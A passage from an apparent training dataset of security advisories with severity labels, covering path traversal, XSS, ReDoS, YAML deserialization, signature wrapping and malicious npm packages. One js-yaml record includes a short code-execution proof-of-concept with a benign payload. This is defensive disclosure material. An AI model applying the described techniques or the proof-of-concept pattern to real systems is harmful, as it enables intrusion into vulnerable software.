servey\n\nA path traversal vulnerability in servey versions prior to 3.3.2 allows an attacker to read content of any arbitrary file.", "text_raw": "Path traversal in servey\n\n[Severity: HIGH]\n\nA path traversal vulnerability in servey versions prior to 3.3.2 allows an attacker to read content of any arbitrary file.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-05-07", "split": "train"} -{"id": "0147746148db6bd7001d", "text": "Telefonica O2 Connection Manager 8.7 Service Trusted Path Privilege Escalation", "text_raw": "Telefonica O2 Connection Manager 8.7 Service Trusted Path Privilege Escalation\n\nSeverity: low", "severity": "low", "severity_label": 0, "source": "zeroscience", "timestamp": "2014-10-09", "split": "train"} -{"id": "d5913854d853b9463bb4", "text": "Improper Verification of Cryptographic Signature in PySAML2\n\nPySAML2 before 5.0.0 does not check that the signature in a SAML document is enveloped and thus signature wrapping is effective, i.e., it is affected by XML Signature Wrapping (XSW). The signature information and the node/object that is signed can be in different places and thus the signature verification will succeed, but the wrong data will be used. This specifically affects the verification of assertions that have been signed.", "text_raw": "Improper Verification of Cryptographic Signature in PySAML2\n\n[Severity: HIGH]\n\nPySAML2 before 5.0.0 does not check that the signature in a SAML document is enveloped and thus signature wrapping is effective, i.e., it is affected by XML Signature Wrapping (XSW). The signature information and the node/object that is signed can be in different places and thus the signature verification will succeed, but the wrong data will be used. This specifically affects the verification of assertions that have been signed.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2020-05-06", "split": "train"} -{"id": "f35840a47762e31c5f96", "text": "personnummer/ruby vulnerable to Improper Input Validation\n\nThis vulnerability was reported to the personnummer team in June 2020. The slow response was due to locked ownership of some of the affected packages, which caused delays to update packages prior to disclosure.\n\n### Impact\n\nThis vulnerability impacts users who rely on the for last digits of personnummer to be a _real_ personnummer.\n\n### Patches\n\nThe issue have been patched in all repositories. The following versions should be updated to as soon as possible:\n\n[C#](https://github.com/advisories/GHSA-qv8q-v995-72gr) 3.0.2 \nD 3.0.1 \n[Dart](https://github.com/advisories/GHSA-4xh4-v2pq-jvhm) 3.0.3 \nElixir 3.0.0 \n[Go](https://github.com/advisories/GHSA-hv53-vf5m-8q94) 3.0.1 \n[Java](https://github.com/advisories/GHSA-q3vw-4jx3-rrr2) 3.3.0 \n[JavaScript](https://github.com/advisories/GHSA-vpgc-7h78-gx8f) 3.1.0 \nKotlin 1.1.0 \nLua 3.0.1 \n[PHP](https://github.com/advisories/GHSA-2p6g-gjp8-ggg9) 3.0.2 \nPerl 3.0.0 \n[Python](https://github.com/advisories/GHSA-rxq3-5249-8hgg) 3.0.2 \n[Ruby](https://github.com/advisories/GHSA-vp9c-fpxx-744v) 3.0.1 \n[Rust](https://github.com/advisories/GHSA-28r9-pq4c-wp3c) 3.0.0 \nScala 3.0.1 \nSwift 1.0.1\n\nIf you are using any of the earlier packages, please update to latest.\n\n### Workarounds\n\nThe issue arrieses from the regular expression allowing the first three digits in the last four digits of the personnummer to be\n000, which is invalid. To mitigate this without upgrading, a check on the last four digits can be made to make sure it's not\n000x.\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n* Open an issue in [Personnummer Meta](https://github.com/personnummer/meta/issues)\n* Email us at [Personnummer Email](mailto:security@personnummer.dev)", "text_raw": "personnummer/ruby vulnerable to Improper Input Validation\n\n[Severity: LOW]\n\nThis vulnerability was reported to the personnummer team in June 2020. The slow response was due to locked ownership of some of the affected packages, which caused delays to update packages prior to disclosure.\n\nThe vulnerability is determined to be low severity.\n\n### Impact\n\nThis vulnerability impacts users who rely on the for last digits of personnummer to be a _real_ personnummer. \n\n### Patches\n\nThe issue have been patched in all repositories. The following versions should be updated to as soon as possible:\n\n[C#](https://github.com/advisories/GHSA-qv8q-v995-72gr) 3.0.2 \nD 3.0.1 \n[Dart](https://github.com/advisories/GHSA-4xh4-v2pq-jvhm) 3.0.3 \nElixir 3.0.0 \n[Go](https://github.com/advisories/GHSA-hv53-vf5m-8q94) 3.0.1 \n[Java](https://github.com/advisories/GHSA-q3vw-4jx3-rrr2) 3.3.0 \n[JavaScript](https://github.com/advisories/GHSA-vpgc-7h78-gx8f) 3.1.0 \nKotlin 1.1.0 \nLua 3.0.1 \n[PHP](https://github.com/advisories/GHSA-2p6g-gjp8-ggg9) 3.0.2 \nPerl 3.0.0 \n[Python](https://github.com/advisories/GHSA-rxq3-5249-8hgg) 3.0.2 \n[Ruby](https://github.com/advisories/GHSA-vp9c-fpxx-744v) 3.0.1 \n[Rust](https://github.com/advisories/GHSA-28r9-pq4c-wp3c) 3.0.0 \nScala 3.0.1 \nSwift 1.0.1 \n\nIf you are using any of the earlier packages, please update to latest.\n\n### Workarounds\n\nThe issue arrieses from the regular expression allowing the first three digits in the last four digits of the personnummer to be\n000, which is invalid. To mitigate this without upgrading, a check on the last four digits can be made to make sure it's not\n000x.\n\n### For more information\n\nIf you have any questions or comments about this advisory:\n* Open an issue in [Personnummer Meta](https://github.com/personnummer/meta/issues)\n* Email us at [Personnummer Email](mailto:security@personnummer.dev)", "severity": "low", "severity_label": 0, "source": "github_advisory", "timestamp": "2020-09-23", "split": "train"} -{"id": "bab3e507c3212e7aee8e", "text": "Malicious Package in m-backdoor\n\nAll versions of `m-backdoor` contain malicious code. The package downloads a file from a remote server and executes it as a preinstall script. At the time of the release of this advisory the downloaded file only defaces websites by removing elements randomly from the DOM.\n\n## Recommendation\n\nRemove the package from your system.", "text_raw": "Malicious Package in m-backdoor\n\n[Severity: CRITICAL]\n\nAll versions of `m-backdoor` contain malicious code. The package downloads a file from a remote server and executes it as a preinstall script. At the time of the release of this advisory the downloaded file only defaces websites by removing elements randomly from the DOM. \n\n\n## Recommendation\n\nRemove the package from your system.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-09-03", "split": "train"} -{"id": "d23a925bc059d8c1e309", "text": "TCExam <=11.2.011 Multiple Cross-Site Scripting Vulnerabilities", "text_raw": "TCExam <=11.2.011 Multiple Cross-Site Scripting Vulnerabilities\n\nSeverity: medium", "severity": "medium", "severity_label": 1, "source": "zeroscience", "timestamp": "2011-07-13", "split": "train"} -{"id": "65ca276d0a0b4ae2633d", "text": "Uncontrolled Resource Consumption in trim-newlines\n\n@rkesters/gnuplot is an easy to use node module to draw charts using gnuplot and ps2pdf. The trim-newlines package before 3.0.1 and 4.x before 4.0.1 for Node.js has an issue related to regular expression denial-of-service (ReDoS) for the `.end()` method.", "text_raw": "Uncontrolled Resource Consumption in trim-newlines\n\n[Severity: HIGH]\n\n@rkesters/gnuplot is an easy to use node module to draw charts using gnuplot and ps2pdf. The trim-newlines package before 3.0.1 and 4.x before 4.0.1 for Node.js has an issue related to regular expression denial-of-service (ReDoS) for the `.end()` method.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-06-07", "split": "train"} -{"id": "a41a8fd2190e62687191", "text": "Regular expression denial of service in react-native\n\nA regular expression denial of service (ReDoS) vulnerability in the validateBaseUrl function can cause the application to use excessive resources, become unresponsive, or crash. This was introduced in react-native version 0.59.0 and fixed in version 0.64.1.", "text_raw": "Regular expression denial of service in react-native\n\n[Severity: HIGH]\n\nA regular expression denial of service (ReDoS) vulnerability in the validateBaseUrl function can cause the application to use excessive resources, become unresponsive, or crash. This was introduced in react-native version 0.59.0 and fixed in version 0.64.1.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-07-20", "split": "train"} -{"id": "79330c886766642c3dad", "text": "OS Command Injection in jw.util\n\nAn exploitable vulnerability exists in the configuration-loading functionality of the jw.util package before 2.3 for Python. When loading a configuration with FromString or FromStream with YAML, one can execute arbitrary Python code, resulting in OS command execution, because safe_load is not used.", "text_raw": "OS Command Injection in jw.util\n\n[Severity: CRITICAL]\n\nAn exploitable vulnerability exists in the configuration-loading functionality of the jw.util package before 2.3 for Python. When loading a configuration with FromString or FromStream with YAML, one can execute arbitrary Python code, resulting in OS command execution, because safe_load is not used.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2021-06-02", "split": "train"} -{"id": "4de988a4f70024032897", "text": "Apache Solr DataImportHandler Code Injection Vulnerability\n\nAffected: Apache Solr\n\nThe optional Apache Solr module DataImportHandler contains a code injection vulnerability.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-94\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "text_raw": "Apache Solr DataImportHandler Code Injection Vulnerability\n\nAffected: Apache Solr\n\nThe optional Apache Solr module DataImportHandler contains a code injection vulnerability.\n\nRequired Action: Apply updates per vendor instructions.\n\nCWE(s): CWE-94\n\n[Source: CISA Known Exploited Vulnerabilities Catalog]", "severity": "critical", "severity_label": 3, "source": "cisa_kev", "timestamp": "2021-12-10", "split": "train"} -{"id": "f8ff8be9c7b1f26a8e2b", "text": "Cross-site scripting vulnerability in TinyMCE plugins\n\n### Impact\nA cross-site scripting (XSS) vulnerability was discovered in the URL processing logic of the `image` and `link` plugins. The vulnerability allowed arbitrary JavaScript execution when updating an image or link using a specially crafted URL. This issue only impacted users while editing and the dangerous URLs were stripped in any content extracted from the editor. This impacts all users who are using TinyMCE 5.9.2 or lower.\n\n### Patches\nThis vulnerability has been patched in TinyMCE 5.10.0 by improved sanitization logic when updating URLs in the relevant plugins.\n\n### Workarounds\nTo work around this vulnerability, either:\n- Upgrade to TinyMCE 5.10.0 or higher\n- Disable the `image` and `link` plugins\n\n### Acknowledgements\nTiny Technologies would like to thank Yakir6 for discovering this vulnerability.\n\n### References\nhttps://www.tiny.cloud/docs/release-notes/release-notes510/#securityfixes\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Email us at [infosec@tiny.cloud](mailto:infosec@tiny.cloud)\n* Open an issue in the [TinyMCE repo](https://github.com/tinymce/tinymce/issues)", "text_raw": "Cross-site scripting vulnerability in TinyMCE plugins\n\n[Severity: MEDIUM]\n\n### Impact\nA cross-site scripting (XSS) vulnerability was discovered in the URL processing logic of the `image` and `link` plugins. The vulnerability allowed arbitrary JavaScript execution when updating an image or link using a specially crafted URL. This issue only impacted users while editing and the dangerous URLs were stripped in any content extracted from the editor. This impacts all users who are using TinyMCE 5.9.2 or lower.\n\n### Patches\nThis vulnerability has been patched in TinyMCE 5.10.0 by improved sanitization logic when updating URLs in the relevant plugins.\n\n### Workarounds\nTo work around this vulnerability, either:\n- Upgrade to TinyMCE 5.10.0 or higher\n- Disable the `image` and `link` plugins\n\n### Acknowledgements\nTiny Technologies would like to thank Yakir6 for discovering this vulnerability.\n\n### References\nhttps://www.tiny.cloud/docs/release-notes/release-notes510/#securityfixes\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Email us at [infosec@tiny.cloud](mailto:infosec@tiny.cloud)\n* Open an issue in the [TinyMCE repo](https://github.com/tinymce/tinymce/issues)", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-11-02", "split": "train"} -{"id": "d5165a7ac0ea04d7ad15", "text": "Arbitrary code execution in Apache Commons BeanUtils\n\nApache Commons BeanUtils, as distributed in lib/commons-beanutils-1.8.0.jar in Apache Struts 1.x through 1.3.10 and in other products requiring commons-beanutils through 1.9.2, does not suppress the class property, which allows remote attackers to \"manipulate\" the ClassLoader and execute arbitrary code via the class parameter, as demonstrated by the passing of this parameter to the getClass method of the ActionForm object in Struts 1.", "text_raw": "Arbitrary code execution in Apache Commons BeanUtils\n\n[Severity: HIGH]\n\nApache Commons BeanUtils, as distributed in lib/commons-beanutils-1.8.0.jar in Apache Struts 1.x through 1.3.10 and in other products requiring commons-beanutils through 1.9.2, does not suppress the class property, which allows remote attackers to \"manipulate\" the ClassLoader and execute arbitrary code via the class parameter, as demonstrated by the passing of this parameter to the getClass method of the ActionForm object in Struts 1.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2020-06-10", "split": "train"} -{"id": "5b7d7dd786702a57023a", "text": "Cross-site scripting in Apache Tomcat\n\nThe SSI printenv command in Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39 and 7.0.0 to 7.0.93 echoes user provided data without escaping and is, therefore, vulnerable to XSS. SSI is disabled by default. The printenv command is intended for debugging and is unlikely to be present in a production website.", "text_raw": "Cross-site scripting in Apache Tomcat\n\n[Severity: MEDIUM]\n\nThe SSI printenv command in Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39 and 7.0.0 to 7.0.93 echoes user provided data without escaping and is, therefore, vulnerable to XSS. SSI is disabled by default. The printenv command is intended for debugging and is unlikely to be present in a production website.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2019-05-30", "split": "train"} -{"id": "d56d9fe04ceb07ed5984", "text": "GeniXCMS v0.0.1 CSRF Add Admin Exploit", "text_raw": "GeniXCMS v0.0.1 CSRF Add Admin Exploit\n\nSeverity: medium", "severity": "medium", "severity_label": 1, "source": "zeroscience", "timestamp": "2015-03-10", "split": "train"} -{"id": "18574b42853071794763", "text": "Improper Certificate Validation in security-framework\n\nIf custom root certificates were registered with a ClientBuilder, the hostname of the target server would not be validated against its presented leaf certificate. This issue was fixed by properly configuring the trust evaluation logic to perform that check.", "text_raw": "Improper Certificate Validation in security-framework\n\n[Severity: MEDIUM]\n\nIf custom root certificates were registered with a ClientBuilder, the hostname of the target server would not be validated against its presented leaf certificate. This issue was fixed by properly configuring the trust evaluation logic to perform that check.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-08-25", "split": "train"} -{"id": "92eb5112718e2178b620", "text": "TimelockController vulnerability in OpenZeppelin Contracts\n\n### Impact\n\nA vulnerability in `TimelockController` allowed an actor with the executor role to take immediate control of the timelock, by resetting the delay to 0 and escalating privileges, thus gaining unrestricted access to assets held in the contract. Instances with the executor role set to \"open\" allow anyone to use the executor role, thus leaving the timelock at risk of being taken over by an attacker.\n\n### Patches\n\nA fix is included in the following releases of `@openzeppelin/contracts` and `@openzeppelin/contracts-upgradeable`:\n- 4.3.1\n- 3.4.2\n- 3.4.2-solc-0.7\n\nDeployed instances of `TimelockController` should be replaced with a fixed version by migrating all assets, ownership, and roles.\n\n### Workarounds\n\nRevoke the executor role from accounts not strictly under the team's control. We recommend revoking all executors that are not also proposers. When applying this mitigation, ensure there is at least one proposer and executor remaining.\n\n### References\n\n[Post-mortem](https://forum.openzeppelin.com/t/timelockcontroller-vulnerability-postmortem/14958).\n\n### Credits\n\nThe issue was identified by an anonymous white hat hacker through [Immunefi](https://immunefi.com/).\n\n### For more information\n\nIf you have any questions or comments about this advisory, or need assistance executing the mitigation, email us at security@openzeppelin.com.", "text_raw": "TimelockController vulnerability in OpenZeppelin Contracts\n\n[Severity: CRITICAL]\n\n### Impact\n\nA vulnerability in `TimelockController` allowed an actor with the executor role to take immediate control of the timelock, by resetting the delay to 0 and escalating privileges, thus gaining unrestricted access to assets held in the contract. Instances with the executor role set to \"open\" allow anyone to use the executor role, thus leaving the timelock at risk of being taken over by an attacker.\n\n### Patches\n\nA fix is included in the following releases of `@openzeppelin/contracts` and `@openzeppelin/contracts-upgradeable`:\n- 4.3.1\n- 3.4.2\n- 3.4.2-solc-0.7\n\nDeployed instances of `TimelockController` should be replaced with a fixed version by migrating all assets, ownership, and roles.\n\n### Workarounds\n\nRevoke the executor role from accounts not strictly under the team's control. We recommend revoking all executors that are not also proposers. When applying this mitigation, ensure there is at least one proposer and executor remaining.\n\n### References\n\n[Post-mortem](https://forum.openzeppelin.com/t/timelockcontroller-vulnerability-postmortem/14958).\n\n### Credits\n\nThe issue was identified by an anonymous white hat hacker through [Immunefi](https://immunefi.com/).\n\n### For more information\n\nIf you have any questions or comments about this advisory, or need assistance executing the mitigation, email us at security@openzeppelin.com.\n", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2021-08-30", "split": "train"} -{"id": "ad663858532fad0bc83d", "text": "pandora-doomsday is malware\n\nThe `pandora-doomsday` package is a malicious package that adds itself to the package.json of other packages discovered on the victim host and attempts to publish the package.\n\nIt has been removed from the npm registry.\n\n## Recommendation\n\nAny computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.\n\nThe package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.", "text_raw": "pandora-doomsday is malware\n\n[Severity: CRITICAL]\n\nThe `pandora-doomsday` package is a malicious package that adds itself to the package.json of other packages discovered on the victim host and attempts to publish the package. \n\nIt has been removed from the npm registry.\n\n\n## Recommendation\n\nAny computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer.\n\nThe package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-09-01", "split": "train"} -{"id": "c51fa86012ae0eeffe3c", "text": "Publify `guest` role users can self-register even when the admin does not allow it\n\nIn Publify, 9.0.0.pre1 to 9.2.4 are vulnerable to Improper Access Control. `guest` role users can self-register even when the admin does not allow it. This happens due to front-end restriction only.", "text_raw": "Publify `guest` role users can self-register even when the admin does not allow it\n\n[Severity: MEDIUM]\n\nIn Publify, 9.0.0.pre1 to 9.2.4 are vulnerable to Improper Access Control. `guest` role users can self-register even when the admin does not allow it. This happens due to front-end restriction only.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-11-03", "split": "train"} -{"id": "1cd5eb2601857c733312", "text": "Permissions bypass in KubeVirt\n\nA flaw was found in the KubeVirt main virt-handler versions before 0.26.0 regarding the access permissions of virt-handler. An attacker with access to create VMs could attach any secret within their namespace, allowing them to read the contents of that secret.", "text_raw": "Permissions bypass in KubeVirt\n\n[Severity: MEDIUM]\n\nA flaw was found in the KubeVirt main virt-handler versions before 0.26.0 regarding the access permissions of virt-handler. An attacker with access to create VMs could attach any secret within their namespace, allowing them to read the contents of that secret.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-06-01", "split": "train"} -{"id": "c61e1e8b5d265b2c9603", "text": "malicious SVG attachment causing stored XSS vulnerability\n\n### Impact\nAn attacker with `write` permissions can upload an SVG file that contains malicious javascript. This javascript will be executed in a user's browser when the user is viewing that SVG file on the wiki.\n\n### Patches\nUsers are strongly advised to upgrade to a patched version.\n\nMoinMoin Wiki 1.9.11 has the necessary fixes and also contains other important fixes.\n\n### Workarounds\nIt is not advised to work around this, but to upgrade MoinMoin to a patched version.\n\nThat said, a work around via a Content Security Policy in the web server might be possible.\n\nAlso, it is of course helpful if you give `write` permissions (which include uploading attachments) only to trusted users.\n\n### For more information\nIf you have any questions or comments about this advisory, email me at [twaldmann@thinkmo.de](mailto:twaldmann@thinkmo.de).\n\n### Credits\n\nThis vulnerability was discovered by:\n\nCatarina Leite from the Checkmarx SCA AppSec team", "text_raw": "malicious SVG attachment causing stored XSS vulnerability\n\n[Severity: MEDIUM]\n\n### Impact\nAn attacker with `write` permissions can upload an SVG file that contains malicious javascript. This javascript will be executed in a user's browser when the user is viewing that SVG file on the wiki.\n\n### Patches\nUsers are strongly advised to upgrade to a patched version.\n\nMoinMoin Wiki 1.9.11 has the necessary fixes and also contains other important fixes.\n\n### Workarounds\nIt is not advised to work around this, but to upgrade MoinMoin to a patched version.\n\nThat said, a work around via a Content Security Policy in the web server might be possible.\n\nAlso, it is of course helpful if you give `write` permissions (which include uploading attachments) only to trusted users.\n\n### For more information\nIf you have any questions or comments about this advisory, email me at [twaldmann@thinkmo.de](mailto:twaldmann@thinkmo.de).\n\n### Credits\n\nThis vulnerability was discovered by:\n\nCatarina Leite from the Checkmarx SCA AppSec team", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2020-11-11", "split": "train"} -{"id": "4ff1a0ccf17d16404abf", "text": "Deserialization Code Execution in js-yaml\n\nVersions 2.0.4 and earlier of `js-yaml` are affected by a code execution vulnerability in the YAML deserializer.\n\n## Proof of Concept\n```\nconst yaml = require('js-yaml');\n\nconst x = `test: !!js/function >\nfunction f() { \nconsole.log(1); \n}();`\n\nyaml.load(x);\n```\n\n## Recommendation\n\nUpdate js-yaml to version 2.0.5 or later, and ensure that all instances where the `.load()` method is called are updated to use `.safeLoad()` instead.", "text_raw": "Deserialization Code Execution in js-yaml\n\n[Severity: CRITICAL]\n\nVersions 2.0.4 and earlier of `js-yaml` are affected by a code execution vulnerability in the YAML deserializer.\n\n## Proof of Concept\n```\nconst yaml = require('js-yaml');\n\nconst x = `test: !!js/function >\nfunction f() { \nconsole.log(1); \n}();`\n\nyaml.load(x);\n```\n\n\n## Recommendation\n\nUpdate js-yaml to version 2.0.5 or later, and ensure that all instances where the `.load()` method is called are updated to use `.safeLoad()` instead.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2017-10-24", "split": "train"} -{"id": "38c596ef3b69bae33edc", "text": "Information Exposure in cordova-android\n\nVersions of `cordova-android` prior to 6.0.0 are vulnerable to Information Exposure through log files. The application calls methods of the Log class. Messages passed to these methods (Log.v(), Log.d(), Log.i(), Log.w(), and Log.e()) are stored in a series of circular buffers on the device. By default, a maximum of four 16 KB rotated logs are kept in addition to the current log. The logged data can be read using Logcat on the device. When using platforms prior to Android 4.1 (Jelly Bean), the log data is not sandboxed per application; any application installed on the device has the capability to read data logged by other applications.\n\n## Recommendation\n\nUpgrade to version 6.0.0 or later.", "text_raw": "Information Exposure in cordova-android\n\n[Severity: HIGH]\n\nVersions of `cordova-android` prior to 6.0.0 are vulnerable to Information Exposure through log files. The application calls methods of the Log class. Messages passed to these methods (Log.v(), Log.d(), Log.i(), Log.w(), and Log.e()) are stored in a series of circular buffers on the device. By default, a maximum of four 16 KB rotated logs are kept in addition to the current log. The logged data can be read using Logcat on the device. When using platforms prior to Android 4.1 (Jelly Bean), the log data is not sandboxed per application; any application installed on the device has the capability to read data logged by other applications.\n\n\n## Recommendation\n\nUpgrade to version 6.0.0 or later.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2020-09-11", "split": "train"} -{"id": "9381591bb6e70d3b2481", "text": "Denial of service in fast-csv\n\n### Impact\nPossible ReDoS (Regular Expression Denial of Service) when using `ignoreEmpty` option when parsing.\n\n### Patches\nThis has been patched in `v4.3.6`\n\n### Workarounds\nYou will only be affected by this if you use the `ignoreEmpty` parsing option. If you do use this option it is recommended that you upgrade to the latest version `v4.3.6`\n\n### References\n\nThis vulnerability was found using a [CodeQL](https://securitylab.github.com/tools/codeql) query which identified `EMPTY_ROW_REGEXP` regular expression as vulnerable.\n[Link to query run](https://lgtm.com/query/8609731774537641779/).\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [fast-csv](https://github.com/C2FO/fast-csv)", "text_raw": "Denial of service in fast-csv\n\n[Severity: LOW]\n\n### Impact\nPossible ReDoS (Regular Expression Denial of Service) when using `ignoreEmpty` option when parsing.\n\n### Patches\nThis has been patched in `v4.3.6`\n\n### Workarounds\nYou will only be affected by this if you use the `ignoreEmpty` parsing option. If you do use this option it is recommended that you upgrade to the latest version `v4.3.6`\n\n### References\n\nThis vulnerability was found using a [CodeQL](https://securitylab.github.com/tools/codeql) query which identified `EMPTY_ROW_REGEXP` regular expression as vulnerable.\n[Link to query run](https://lgtm.com/query/8609731774537641779/). \n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [fast-csv](https://github.com/C2FO/fast-csv)", "severity": "low", "severity_label": 0, "source": "github_advisory", "timestamp": "2020-12-08", "split": "train"} -{"id": "26bf580e994092044784", "text": "Cross-site scripting in eZ Platform Kernel\n\n### Impact\nIn file upload it is possible by certain means to upload files like .html and .js. These may contain XSS exploits which will be run when links to them are accessed by victims.\n\n### Patches\nThe fix consists simply of adding common types of scriptable file types to the configuration of the already existing filetype blacklist feature. See \"Patched versions\". As such, this can also be done manually, without installing the patched versions. This may be relevant if you are currently running a considerably older version of the kernel package and don't want to upgrade it at this time. Please see the settting \"ezsettings.default.io.file_storage.file_type_blacklist\" at:\nhttps://github.com/ezsystems/ezplatform-kernel/blob/master/eZ/Bundle/EzPublishCoreBundle/Resources/config/default_settings.yml#L109\n\n### Important note\nYou should adapt this setting to your needs. Do not add file types to the blacklist that you actually need to be able to upload. For instance, if you need your editors to be able to upload SVG files, then don't blacklist that. Instead, you could e.g. use an approval workflow for such content.", "text_raw": "Cross-site scripting in eZ Platform Kernel\n\n[Severity: HIGH]\n\n### Impact\nIn file upload it is possible by certain means to upload files like .html and .js. These may contain XSS exploits which will be run when links to them are accessed by victims.\n\n### Patches\nThe fix consists simply of adding common types of scriptable file types to the configuration of the already existing filetype blacklist feature. See \"Patched versions\". As such, this can also be done manually, without installing the patched versions. This may be relevant if you are currently running a considerably older version of the kernel package and don't want to upgrade it at this time. Please see the settting \"ezsettings.default.io.file_storage.file_type_blacklist\" at:\nhttps://github.com/ezsystems/ezplatform-kernel/blob/master/eZ/Bundle/EzPublishCoreBundle/Resources/config/default_settings.yml#L109\n\n### Important note\nYou should adapt this setting to your needs. Do not add file types to the blacklist that you actually need to be able to upload. For instance, if you need your editors to be able to upload SVG files, then don't blacklist that. Instead, you could e.g. use an approval workflow for such content.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-03-19", "split": "train"} -{"id": "22e30eb9b841626411f3", "text": "RCE in Third Party Library in Shopware\n\n### Impact\nRCE in Third Party Library\n\n### Patches\nWe recommend to update to the current version 6.3.1.1. You can get the update to 6.3.1.1 regularly via the Auto-Updater or directly via the download overview.\n\nFor older versions you can use the Security Plugin:\nhttps://store.shopware.com/en/detail/index/sArticle/518463/number/Swag136939272659\n\n### References\nhttps://docs.shopware.com/en/shopware-6-en/security-updates/security-update-09-2020", "text_raw": "RCE in Third Party Library in Shopware\n\n[Severity: LOW]\n\n### Impact\nRCE in Third Party Library\n\n### Patches\nWe recommend to update to the current version 6.3.1.1. You can get the update to 6.3.1.1 regularly via the Auto-Updater or directly via the download overview. \n\nFor older versions you can use the Security Plugin:\nhttps://store.shopware.com/en/detail/index/sArticle/518463/number/Swag136939272659\n\n### References\nhttps://docs.shopware.com/en/shopware-6-en/security-updates/security-update-09-2020", "severity": "low", "severity_label": 0, "source": "github_advisory", "timestamp": "2020-09-23", "split": "train"} -{"id": "e3af2e4c41c28a43cf7f", "text": "Use of unitialized value in TFLite\n\n### Impact\nAll TFLite operations that use quantization can be made to use unitialized values. [For example](https://github.com/tensorflow/tensorflow/blob/460e000de3a83278fb00b61a16d161b1964f15f4/tensorflow/lite/kernels/depthwise_conv.cc#L198-L200):\n\n```cc\n const auto* affine_quantization =\n reinterpret_cast(\n filter->quantization.params);\n```\n\nThe issue stems from the fact that `quantization.params` is only valid if `quantization.type` is different that `kTfLiteNoQuantization`. However, these checks are missing in large parts of the code.\n\n### Patches\nWe have patched the issue in GitHub commits [537bc7c723439b9194a358f64d871dd326c18887](https://github.com/tensorflow/tensorflow/commit/537bc7c723439b9194a358f64d871dd326c18887),\n[4a91f2069f7145aab6ba2d8cfe41be8a110c18a5](https://github.com/tensorflow/tensorflow/commit/4a91f2069f7145aab6ba2d8cfe41be8a110c18a5) and [8933b8a21280696ab119b63263babdb54c298538](https://github.com/tensorflow/tensorflow/commit/8933b8a21280696ab119b63263babdb54c298538).\n\nThe fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n### Attribution \nThis vulnerability has been reported by members of the Aivul Team from Qihoo 360.", "text_raw": "Use of unitialized value in TFLite\n\n[Severity: MEDIUM]\n\n### Impact\nAll TFLite operations that use quantization can be made to use unitialized values. [For example](https://github.com/tensorflow/tensorflow/blob/460e000de3a83278fb00b61a16d161b1964f15f4/tensorflow/lite/kernels/depthwise_conv.cc#L198-L200):\n\n```cc\n const auto* affine_quantization =\n reinterpret_cast(\n filter->quantization.params);\n```\n\nThe issue stems from the fact that `quantization.params` is only valid if `quantization.type` is different that `kTfLiteNoQuantization`. However, these checks are missing in large parts of the code.\n\n### Patches\nWe have patched the issue in GitHub commits [537bc7c723439b9194a358f64d871dd326c18887](https://github.com/tensorflow/tensorflow/commit/537bc7c723439b9194a358f64d871dd326c18887),\n[4a91f2069f7145aab6ba2d8cfe41be8a110c18a5](https://github.com/tensorflow/tensorflow/commit/4a91f2069f7145aab6ba2d8cfe41be8a110c18a5) and [8933b8a21280696ab119b63263babdb54c298538](https://github.com/tensorflow/tensorflow/commit/8933b8a21280696ab119b63263babdb54c298538).\n\nThe fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n### Attribution \nThis vulnerability has been reported by members of the Aivul Team from Qihoo 360. ", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-08-25", "split": "train"} -{"id": "51170050aa4b69358da4", "text": "Django vulnerable to information leakage in AuthenticationForm\n\n`django.contrib.auth.forms.AuthenticationForm` in Django 2.0 before 2.0.2, and 1.11.8 and 1.11.9, allows remote attackers to obtain potentially sensitive information by leveraging data exposure from the `confirm_login_allowed()` method, as demonstrated by discovering whether a user account is inactive.", "text_raw": "Django vulnerable to information leakage in AuthenticationForm\n\n[Severity: HIGH]\n\n`django.contrib.auth.forms.AuthenticationForm` in Django 2.0 before 2.0.2, and 1.11.8 and 1.11.9, allows remote attackers to obtain potentially sensitive information by leveraging data exposure from the `confirm_login_allowed()` method, as demonstrated by discovering whether a 